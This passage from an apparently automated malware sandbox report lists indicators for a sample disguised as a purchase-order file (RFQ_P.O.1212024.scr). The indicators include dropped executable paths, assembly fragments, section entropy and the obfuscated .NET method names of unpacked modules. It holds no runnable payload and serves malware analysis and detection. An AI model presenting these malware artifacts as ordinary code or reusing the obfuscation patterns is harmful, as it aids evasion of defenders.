                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D9210 push esp; iretd 10_2_001D9211
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D922A push esp; iretd 10_2_001D922B
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D93B4 push ebx; iretd 10_2_001D93B5
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040B6438 push D687906Bh; ret 11_2_040B645D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040AD4CD push cs; retf 11_2_040AD4FE
                Source: RFQ_P.O.1212024.scrStatic PE information: section name: .text entropy: 7.712122709503229
                Source: PEJmengI.exe.0.drStatic PE information: section name: .text entropy: 7.712122709503229
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, p9whqVMj7km6hvFd4B.csHigh entropy of concatenated method names: 'WdyofoXAj', 'gaFalC21b', 'gGiH9AfTA', 'efqA1TnpU', 'bRl34BSYF', 'PO0GKx5Ex', 'SZAQxNyAZf4mah7DB8', 'kEDXlUlXVBtMcBCxFS', 'e4RJ4qgy3', 'bQjV3j0dE'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, MZC66lyJS5fEAyDFsA.csHigh entropy of concatenated method names: 'Pq3BrP2rPy', 'gZFB412JHr', 'oYWBFQKnrJ', 'VBnB61Qn7d', 'IvjBtZfVIc', 'bCqFwOKlV8', 'bGYFKPQbEp', 'qpcFp2LCZ9', 'jeQFcCENbG', 'gxUFx7gbHO'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, DCZlwmmiGGJ8he9Pdm.csHigh entropy of concatenated method names: 'ToString', 'gbBCTTkK4c', 'eX0CZZKx8P', 'JFECPbR86b', 'I5NC8hdjd2', 'wt5CvoumQI', 'GJcC5lk6DR', 'gKYCDHAZTS', 'vFUCuqOjlg', 'GlECdbw21W'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, a8I4p6KMHEsK9Nkxwx.csHigh entropy of concatenated method names: 'G0lhcoIBcL', 'iDvhRn7pBN', 'HNjJ2M7tl8', 'PEoJXH85in', 'SXmhTYyxaL', 'BAfhl6xMOj', 'RDxh0xePAE', 'n8EhesRtmV', 'dOUhnpxfdy', 'gRIhmPtOLl'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, s3kk7jb7SDrahtghN8.csHigh entropy of concatenated method names: 'qkXX6hfevc', 'SMYXtctH7v', 'ekBXk3wfCa', 'iFvXLjwlXE', 'dPpX9v5uZC', 'j6lXCJS5fE', 'p4MMACW7jYpdjW6wyS', 'MFscCCT8BB1U9PChgi', 'VQadIwOMC4XMRWs6AH', 'roMXXn8MOq'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, S6CYiadgd1bbv4MQCM.csHigh entropy of concatenated method names: 'GBS6OvFFJV', 'qIi6NEyvxJ', 'kfj6oIAtQn', 'R6s6aSFtRZ', 'WLd6UX0v6H', 'Kqk6HTiDLU', 'B886AgBabl', 'D8K6iu72Za', 'FWB63eetox', 'b386Giivvg'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ybmdBps6EBLDHEsODi.csHigh entropy of concatenated method names: 'vcdhk2Iwet', 'ogDhL9jLnC', 'ToString', 'wfehEo05gy', 'h5Qh4oSUH5', 'wmwh7T3NE7', 'AgghFMmybj', 'CGRhBR9PS8', 'VVkh6wuqTu', 'exhhtUkVBn'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, UmmxlKRVrJuuCq8qcB.csHigh entropy of concatenated method names: 'W5eV7uLhxx', 'LLKVFTw8Ju', 'hmrVBe3Q9p', 'sSxV6gVvve', 'fhkVg8pxkk', 'QVJVt0btWx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, oUBP47XMvqWrjoQmcNf.csHigh entropy of concatenated method names: 'ToString', 'fSOWijJAMi', 'vfuW3Fdo6n', 'EL8WGTD64L', 'F3HWyxdcpC', 'D6mWZMapdS', 'exMWPiA1Uu', 'pdrW8uXoVs', 'lKqiqK0W95uN81vvF2H', 'GIRxlv0ARLbl7Q3eUKi'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, UlXExhGXDZPw1jPpv5.csHigh entropy of concatenated method names: 'akLFU7OdEK', 'eMHFADcwbh', 'UEf7Pc7CU2', 'ljR787Bk0D', 'KK07vnmcrT', 'IUJ75SLwpS', 'w5C7DEf1AD', 'CGl7uHkf08', 'VPJ7d4nqqN', 'tto7q2PmTw'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, bhfevcinMYctH7vReL.csHigh entropy of concatenated method names: 'lBD4eRDJqQ', 'Yi44nMIkTA', 'lmB4mrQ41x', 'hlX4sZWwZd', 'Yss4wyB11F', 'qU34Kx031x', 'vyL4pOBMOE', 'wpD4cjsx5P', 'ypW4xcylEV', 'fLb4RHG0Bm'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, QA77Vy5wHffBZWP1MA.csHigh entropy of concatenated method names: 'qyABmOJrhC', 'rBmBsiwmtK', 'UBCBw5ZCFL', 'ToString', 'dicBKpmAen', 'os7BpT4P38', 'BwuasOZLEHP2qQLfWpP', 'Yd4uv1ZlUi8SylaVlni', 'sWeY0PZYEk6DNw8KfXD'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, NrVMJxDdfbtvtBhJeH.csHigh entropy of concatenated method names: 'Ge06ETdhYx', 'tRH67kVc70', 'bN36B0PDKr', 'RHSBRrQkUQ', 'PrABzbhftw', 'aIn62kXT5f', 'RDZ6XTXC7D', 'FP06MPWc1J', 'tbC6jArUAc', 'Ab76bhitIT'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, N19SIUX2lsGqOUG78NH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Kk3VTYjd2K', 'Bu0Vl2D4tj', 'JcmV0aGPBm', 'M8VVeXcRJD', 'FTbVnZdgXv', 'PliVmo1O7P', 'cF9VsMraLy'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, zw6oei0qks56CqEOgd.csHigh entropy of concatenated method names: 'VOgfihTZOW', 'C0vf3nXVCy', 'P0mfytYIpj', 'XQMfZZIkmF', 'ePbf8NOb1J', 'HSWfvC9xxb', 'XlgfDnP0np', 'wQ9fuFDjd1', 'mxffqiJlny', 'W82fTBK10P'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, T4Cjyr3kB3wfCaBFvj.csHigh entropy of concatenated method names: 'L9h7ayt0lH', 't0m7HpbhlV', 'swZ7ing4fK', 'xJ473SqBaE', 'v4h79C9Rt2', 'Ia47CAkwYC', 'vXI7hgZmos', 'YPh7JA8AYF', 'X6f7gmaMX4', 'jDs7VFdCyh'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.csHigh entropy of concatenated method names: 'TDNjrcwZfl', 'OY9jEYGKAg', 'PsEj4SKcoe', 'rQTj7qYuSM', 'gXijF41xqX', 'xGTjBgYDqT', 'gbgj6DFLsc', 'DyWjtqM4Bc', 'J3MjI51INh', 'anhjk3sq7h'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, QytIh1XXDKo5MP7oJ4d.csHigh entropy of concatenated method names: 'GhyVR2snxZ', 'EZ8VzBeFp2', 'n9HW24S1EZ', 'uvUWXWp93J', 'IXlWMpBL7Z', 'yfBWjP9RSs', 'cdhWb3xrIG', 'hx6WrdQ89V', 'gyeWE5Z2tX', 'qnTW4rRMts'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, HvVJuo8ktUaN28KN6D.csHigh entropy of concatenated method names: 'Y4PBSM75ye', 'gCjBOD9STi', 'wjvBouF63p', 'PqNBaZALQr', 'cDGBHInm7u', 'znIBAeqrFM', 'z87B3dpNrR', 'yopBGmMkmK', 'NZR1XqZi5is5nCyW5FM', 'SHSVwcZaJBktpg33Usm'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, DdWhTCpLUOFOaZUA7y.csHigh entropy of concatenated method names: 'YcZg9htX5b', 'pXXghEjK8h', 'T0UggM5bLa', 'CvLgWPJL7N', 'gCjgYxyEcK', 'DfMgSU7WWG', 'Dispose', 'UyAJEch5kF', 'a1gJ4iL4wY', 'I1cJ7Iu4hx'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, VLHFBaZiQVfOIFJqar.csHigh entropy of concatenated method names: 'YmyXbgZVqoVNNQhDjJ2', 'wWyYhxZXb16abobf00h', 'v9XBJ70gxP', 'ciMBgLH0ba', 'OarBVHZ8A4', 'AL2Nw9ZEWI4XCMRNCFq', 'F6OpQlZoUpdcsSZZ9uM', 'BVVujIZcFO7HodAH4w5'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, U8An9uxiYkVBxn8NPY.csHigh entropy of concatenated method names: 'zaFgyLF56i', 'keRgZANsdr', 'qsvgPARIKC', 'VNag80fWGY', 'yKlgvcgeYD', 'Xcig50Ylm3', 'YmBgDF7NmX', 'UiHguXf4Mc', 'H7RgdCODfg', 'rgJgqlURLV'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, WxiPQ2413yrVZaeiGh.csHigh entropy of concatenated method names: 'Dispose', 'xFOXxaZUA7', 'BjyMZgSnAK', 'VHGxJT8WRl', 'G9RXRwds82', 'N3wXzQ4y7i', 'ProcessDialogKey', 'zlwM28An9u', 'DYkMXVBxn8', 'yPYMMwmmxl'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, iIr6kyzks73p42nxWv.csHigh entropy of concatenated method names: 'HjRVHmyo2b', 'fQDVi3X1G0', 'on9V39uAU2', 'maxVy1I1HC', 'UuoVZJo3tW', 'Q37V8hBDgV', 'L0rVvU63LL', 'g4KVS0P3Yu', 'DABVOUW2De', 'dnJVNcW4Ub'
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ChRdp5Xbobw2elyK2ZM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QRGQgxm9cq', 'j04QVFn3an', 'GJwQW8mObB', 'vxaQQhqkLw', 'B88QYHJ1qK', 'LxsQ16g75I', 'hlmQSaK8BO'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, p9whqVMj7km6hvFd4B.csHigh entropy of concatenated method names: 'WdyofoXAj', 'gaFalC21b', 'gGiH9AfTA', 'efqA1TnpU', 'bRl34BSYF', 'PO0GKx5Ex', 'SZAQxNyAZf4mah7DB8', 'kEDXlUlXVBtMcBCxFS', 'e4RJ4qgy3', 'bQjV3j0dE'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, MZC66lyJS5fEAyDFsA.csHigh entropy of concatenated method names: 'Pq3BrP2rPy', 'gZFB412JHr', 'oYWBFQKnrJ', 'VBnB61Qn7d', 'IvjBtZfVIc', 'bCqFwOKlV8', 'bGYFKPQbEp', 'qpcFp2LCZ9', 'jeQFcCENbG', 'gxUFx7gbHO'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, DCZlwmmiGGJ8he9Pdm.csHigh entropy of concatenated method names: 'ToString', 'gbBCTTkK4c', 'eX0CZZKx8P', 'JFECPbR86b', 'I5NC8hdjd2', 'wt5CvoumQI', 'GJcC5lk6DR', 'gKYCDHAZTS', 'vFUCuqOjlg', 'GlECdbw21W'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, a8I4p6KMHEsK9Nkxwx.csHigh entropy of concatenated method names: 'G0lhcoIBcL', 'iDvhRn7pBN', 'HNjJ2M7tl8', 'PEoJXH85in', 'SXmhTYyxaL', 'BAfhl6xMOj', 'RDxh0xePAE', 'n8EhesRtmV', 'dOUhnpxfdy', 'gRIhmPtOLl'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, s3kk7jb7SDrahtghN8.csHigh entropy of concatenated method names: 'qkXX6hfevc', 'SMYXtctH7v', 'ekBXk3wfCa', 'iFvXLjwlXE', 'dPpX9v5uZC', 'j6lXCJS5fE', 'p4MMACW7jYpdjW6wyS', 'MFscCCT8BB1U9PChgi', 'VQadIwOMC4XMRWs6AH', 'roMXXn8MOq'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, S6CYiadgd1bbv4MQCM.csHigh entropy of concatenated method names: 'GBS6OvFFJV', 'qIi6NEyvxJ', 'kfj6oIAtQn', 'R6s6aSFtRZ', 'WLd6UX0v6H', 'Kqk6HTiDLU', 'B886AgBabl', 'D8K6iu72Za', 'FWB63eetox', 'b386Giivvg'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ybmdBps6EBLDHEsODi.csHigh entropy of concatenated method names: 'vcdhk2Iwet', 'ogDhL9jLnC', 'ToString', 'wfehEo05gy', 'h5Qh4oSUH5', 'wmwh7T3NE7', 'AgghFMmybj', 'CGRhBR9PS8', 'VVkh6wuqTu', 'exhhtUkVBn'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, UmmxlKRVrJuuCq8qcB.csHigh entropy of concatenated method names: 'W5eV7uLhxx', 'LLKVFTw8Ju', 'hmrVBe3Q9p', 'sSxV6gVvve', 'fhkVg8pxkk', 'QVJVt0btWx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, oUBP47XMvqWrjoQmcNf.csHigh entropy of concatenated method names: 'ToString', 'fSOWijJAMi', 'vfuW3Fdo6n', 'EL8WGTD64L', 'F3HWyxdcpC', 'D6mWZMapdS', 'exMWPiA1Uu', 'pdrW8uXoVs', 'lKqiqK0W95uN81vvF2H', 'GIRxlv0ARLbl7Q3eUKi'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, UlXExhGXDZPw1jPpv5.csHigh entropy of concatenated method names: 'akLFU7OdEK', 'eMHFADcwbh', 'UEf7Pc7CU2', 'ljR787Bk0D', 'KK07vnmcrT', 'IUJ75SLwpS', 'w5C7DEf1AD', 'CGl7uHkf08', 'VPJ7d4nqqN', 'tto7q2PmTw'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, bhfevcinMYctH7vReL.csHigh entropy of concatenated method names: 'lBD4eRDJqQ', 'Yi44nMIkTA', 'lmB4mrQ41x', 'hlX4sZWwZd', 'Yss4wyB11F', 'qU34Kx031x', 'vyL4pOBMOE', 'wpD4cjsx5P', 'ypW4xcylEV', 'fLb4RHG0Bm'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, QA77Vy5wHffBZWP1MA.csHigh entropy of concatenated method names: 'qyABmOJrhC', 'rBmBsiwmtK', 'UBCBw5ZCFL', 'ToString', 'dicBKpmAen', 'os7BpT4P38', 'BwuasOZLEHP2qQLfWpP', 'Yd4uv1ZlUi8SylaVlni', 'sWeY0PZYEk6DNw8KfXD'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, NrVMJxDdfbtvtBhJeH.csHigh entropy of concatenated method names: 'Ge06ETdhYx', 'tRH67kVc70', 'bN36B0PDKr', 'RHSBRrQkUQ', 'PrABzbhftw', 'aIn62kXT5f', 'RDZ6XTXC7D', 'FP06MPWc1J', 'tbC6jArUAc', 'Ab76bhitIT'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, N19SIUX2lsGqOUG78NH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Kk3VTYjd2K', 'Bu0Vl2D4tj', 'JcmV0aGPBm', 'M8VVeXcRJD', 'FTbVnZdgXv', 'PliVmo1O7P', 'cF9VsMraLy'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, zw6oei0qks56CqEOgd.csHigh entropy of concatenated method names: 'VOgfihTZOW', 'C0vf3nXVCy', 'P0mfytYIpj', 'XQMfZZIkmF', 'ePbf8NOb1J', 'HSWfvC9xxb', 'XlgfDnP0np', 'wQ9fuFDjd1', 'mxffqiJlny', 'W82fTBK10P'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, T4Cjyr3kB3wfCaBFvj.csHigh entropy of concatenated method names: 'L9h7ayt0lH', 't0m7HpbhlV', 'swZ7ing4fK', 'xJ473SqBaE', 'v4h79C9Rt2', 'Ia47CAkwYC', 'vXI7hgZmos', 'YPh7JA8AYF', 'X6f7gmaMX4', 'jDs7VFdCyh'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.csHigh entropy of concatenated method names: 'TDNjrcwZfl', 'OY9jEYGKAg', 'PsEj4SKcoe', 'rQTj7qYuSM', 'gXijF41xqX', 'xGTjBgYDqT', 'gbgj6DFLsc', 'DyWjtqM4Bc', 'J3MjI51INh', 'anhjk3sq7h'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, QytIh1XXDKo5MP7oJ4d.csHigh entropy of concatenated method names: 'GhyVR2snxZ', 'EZ8VzBeFp2', 'n9HW24S1EZ', 'uvUWXWp93J', 'IXlWMpBL7Z', 'yfBWjP9RSs', 'cdhWb3xrIG', 'hx6WrdQ89V', 'gyeWE5Z2tX', 'qnTW4rRMts'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, HvVJuo8ktUaN28KN6D.csHigh entropy of concatenated method names: 'Y4PBSM75ye', 'gCjBOD9STi', 'wjvBouF63p', 'PqNBaZALQr', 'cDGBHInm7u', 'znIBAeqrFM', 'z87B3dpNrR', 'yopBGmMkmK', 'NZR1XqZi5is5nCyW5FM', 'SHSVwcZaJBktpg33Usm'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, DdWhTCpLUOFOaZUA7y.csHigh entropy of concatenated method names: 'YcZg9htX5b', 'pXXghEjK8h', 'T0UggM5bLa', 'CvLgWPJL7N', 'gCjgYxyEcK', 'DfMgSU7WWG', 'Dispose', 'UyAJEch5kF', 'a1gJ4iL4wY', 'I1cJ7Iu4hx'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, VLHFBaZiQVfOIFJqar.csHigh entropy of concatenated method names: 'YmyXbgZVqoVNNQhDjJ2', 'wWyYhxZXb16abobf00h', 'v9XBJ70gxP', 'ciMBgLH0ba', 'OarBVHZ8A4', 'AL2Nw9ZEWI4XCMRNCFq', 'F6OpQlZoUpdcsSZZ9uM', 'BVVujIZcFO7HodAH4w5'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, U8An9uxiYkVBxn8NPY.csHigh entropy of concatenated method names: 'zaFgyLF56i', 'keRgZANsdr', 'qsvgPARIKC', 'VNag80fWGY', 'yKlgvcgeYD', 'Xcig50Ylm3', 'YmBgDF7NmX', 'UiHguXf4Mc', 'H7RgdCODfg', 'rgJgqlURLV'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, WxiPQ2413yrVZaeiGh.csHigh entropy of concatenated method names: 'Dispose', 'xFOXxaZUA7', 'BjyMZgSnAK', 'VHGxJT8WRl', 'G9RXRwds82', 'N3wXzQ4y7i', 'ProcessDialogKey', 'zlwM28An9u', 'DYkMXVBxn8', 'yPYMMwmmxl'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, iIr6kyzks73p42nxWv.csHigh entropy of concatenated method names: 'HjRVHmyo2b', 'fQDVi3X1G0', 'on9V39uAU2', 'maxVy1I1HC', 'UuoVZJo3tW', 'Q37V8hBDgV', 'L0rVvU63LL', 'g4KVS0P3Yu', 'DABVOUW2De', 'dnJVNcW4Ub'
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ChRdp5Xbobw2elyK2ZM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QRGQgxm9cq', 'j04QVFn3an', 'GJwQW8mObB', 'vxaQQhqkLw', 'B88QYHJ1qK', 'LxsQ16g75I', 'hlmQSaK8BO'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, p9whqVMj7km6hvFd4B.csHigh entropy of concatenated method names: 'WdyofoXAj', 'gaFalC21b', 'gGiH9AfTA', 'efqA1TnpU', 'bRl34BSYF', 'PO0GKx5Ex', 'SZAQxNyAZf4mah7DB8', 'kEDXlUlXVBtMcBCxFS', 'e4RJ4qgy3', 'bQjV3j0dE'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, MZC66lyJS5fEAyDFsA.csHigh entropy of concatenated method names: 'Pq3BrP2rPy', 'gZFB412JHr', 'oYWBFQKnrJ', 'VBnB61Qn7d', 'IvjBtZfVIc', 'bCqFwOKlV8', 'bGYFKPQbEp', 'qpcFp2LCZ9', 'jeQFcCENbG', 'gxUFx7gbHO'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, DCZlwmmiGGJ8he9Pdm.csHigh entropy of concatenated method names: 'ToString', 'gbBCTTkK4c', 'eX0CZZKx8P', 'JFECPbR86b', 'I5NC8hdjd2', 'wt5CvoumQI', 'GJcC5lk6DR', 'gKYCDHAZTS', 'vFUCuqOjlg', 'GlECdbw21W'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, a8I4p6KMHEsK9Nkxwx.csHigh entropy of concatenated method names: 'G0lhcoIBcL', 'iDvhRn7pBN', 'HNjJ2M7tl8', 'PEoJXH85in', 'SXmhTYyxaL', 'BAfhl6xMOj', 'RDxh0xePAE', 'n8EhesRtmV', 'dOUhnpxfdy', 'gRIhmPtOLl'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, s3kk7jb7SDrahtghN8.csHigh entropy of concatenated method names: 'qkXX6hfevc', 'SMYXtctH7v', 'ekBXk3wfCa', 'iFvXLjwlXE', 'dPpX9v5uZC', 'j6lXCJS5fE', 'p4MMACW7jYpdjW6wyS', 'MFscCCT8BB1U9PChgi', 'VQadIwOMC4XMRWs6AH', 'roMXXn8MOq'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, S6CYiadgd1bbv4MQCM.csHigh entropy of concatenated method names: 'GBS6OvFFJV', 'qIi6NEyvxJ', 'kfj6oIAtQn', 'R6s6aSFtRZ', 'WLd6UX0v6H', 'Kqk6HTiDLU', 'B886AgBabl', 'D8K6iu72Za', 'FWB63eetox', 'b386Giivvg'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ybmdBps6EBLDHEsODi.csHigh entropy of concatenated method names: 'vcdhk2Iwet', 'ogDhL9jLnC', 'ToString', 'wfehEo05gy', 'h5Qh4oSUH5', 'wmwh7T3NE7', 'AgghFMmybj', 'CGRhBR9PS8', 'VVkh6wuqTu', 'exhhtUkVBn'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, UmmxlKRVrJuuCq8qcB.csHigh entropy of concatenated method names: 'W5eV7uLhxx', 'LLKVFTw8Ju', 'hmrVBe3Q9p', 'sSxV6gVvve', 'fhkVg8pxkk', 'QVJVt0btWx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, oUBP47XMvqWrjoQmcNf.csHigh entropy of concatenated method names: 'ToString', 'fSOWijJAMi', 'vfuW3Fdo6n', 'EL8WGTD64L', 'F3HWyxdcpC', 'D6mWZMapdS', 'exMWPiA1Uu', 'pdrW8uXoVs', 'lKqiqK0W95uN81vvF2H', 'GIRxlv0ARLbl7Q3eUKi'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, UlXExhGXDZPw1jPpv5.csHigh entropy of concatenated method names: 'akLFU7OdEK', 'eMHFADcwbh', 'UEf7Pc7CU2', 'ljR787Bk0D', 'KK07vnmcrT', 'IUJ75SLwpS', 'w5C7DEf1AD', 'CGl7uHkf08', 'VPJ7d4nqqN', 'tto7q2PmTw'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, bhfevcinMYctH7vReL.csHigh entropy of concatenated method names: 'lBD4eRDJqQ', 'Yi44nMIkTA', 'lmB4mrQ41x', 'hlX4sZWwZd', 'Yss4wyB11F', 'qU34Kx031x', 'vyL4pOBMOE', 'wpD4cjsx5P', 'ypW4xcylEV', 'fLb4RHG0Bm'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, QA77Vy5wHffBZWP1MA.csHigh entropy of concatenated method names: 'qyABmOJrhC', 'rBmBsiwmtK', 'UBCBw5ZCFL', 'ToString', 'dicBKpmAen', 'os7BpT4P38', 'BwuasOZLEHP2qQLfWpP', 'Yd4uv1ZlUi8SylaVlni', 'sWeY0PZYEk6DNw8KfXD'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, NrVMJxDdfbtvtBhJeH.csHigh entropy of concatenated method names: 'Ge06ETdhYx', 'tRH67kVc70', 'bN36B0PDKr', 'RHSBRrQkUQ', 'PrABzbhftw', 'aIn62kXT5f', 'RDZ6XTXC7D', 'FP06MPWc1J', 'tbC6jArUAc', 'Ab76bhitIT'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, N19SIUX2lsGqOUG78NH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Kk3VTYjd2K', 'Bu0Vl2D4tj', 'JcmV0aGPBm', 'M8VVeXcRJD', 'FTbVnZdgXv', 'PliVmo1O7P', 'cF9VsMraLy'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, zw6oei0qks56CqEOgd.csHigh entropy of concatenated method names: 'VOgfihTZOW', 'C0vf3nXVCy', 'P0mfytYIpj', 'XQMfZZIkmF', 'ePbf8NOb1J', 'HSWfvC9xxb', 'XlgfDnP0np', 'wQ9fuFDjd1', 'mxffqiJlny', 'W82fTBK10P'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, T4Cjyr3kB3wfCaBFvj.csHigh entropy of concatenated method names: 'L9h7ayt0lH', 't0m7HpbhlV', 'swZ7ing4fK', 'xJ473SqBaE', 'v4h79C9Rt2', 'Ia47CAkwYC', 'vXI7hgZmos', 'YPh7JA8AYF', 'X6f7gmaMX4', 'jDs7VFdCyh'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.csHigh entropy of concatenated method names: 'TDNjrcwZfl', 'OY9jEYGKAg', 'PsEj4SKcoe', 'rQTj7qYuSM', 'gXijF41xqX', 'xGTjBgYDqT', 'gbgj6DFLsc', 'DyWjtqM4Bc', 'J3MjI51INh', 'anhjk3sq7h'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, QytIh1XXDKo5MP7oJ4d.csHigh entropy of concatenated method names: 'GhyVR2snxZ', 'EZ8VzBeFp2', 'n9HW24S1EZ', 'uvUWXWp93J', 'IXlWMpBL7Z', 'yfBWjP9RSs', 'cdhWb3xrIG', 'hx6WrdQ89V', 'gyeWE5Z2tX', 'qnTW4rRMts'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, HvVJuo8ktUaN28KN6D.csHigh entropy of concatenated method names: 'Y4PBSM75ye', 'gCjBOD9STi', 'wjvBouF63p', 'PqNBaZALQr', 'cDGBHInm7u', 'znIBAeqrFM', 'z87B3dpNrR', 'yopBGmMkmK', 'NZR1XqZi5is5nCyW5FM', 'SHSVwcZaJBktpg33Usm'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, DdWhTCpLUOFOaZUA7y.csHigh entropy of concatenated method names: 'YcZg9htX5b', 'pXXghEjK8h', 'T0UggM5bLa', 'CvLgWPJL7N', 'gCjgYxyEcK', 'DfMgSU7WWG', 'Dispose', 'UyAJEch5kF', 'a1gJ4iL4wY', 'I1cJ7Iu4hx'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, VLHFBaZiQVfOIFJqar.csHigh entropy of concatenated method names: 'YmyXbgZVqoVNNQhDjJ2', 'wWyYhxZXb16abobf00h', 'v9XBJ70gxP', 'ciMBgLH0ba', 'OarBVHZ8A4', 'AL2Nw9ZEWI4XCMRNCFq', 'F6OpQlZoUpdcsSZZ9uM', 'BVVujIZcFO7HodAH4w5'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, U8An9uxiYkVBxn8NPY.csHigh entropy of concatenated method names: 'zaFgyLF56i', 'keRgZANsdr', 'qsvgPARIKC', 'VNag80fWGY', 'yKlgvcgeYD', 'Xcig50Ylm3', 'YmBgDF7NmX', 'UiHguXf4Mc', 'H7RgdCODfg', 'rgJgqlURLV'
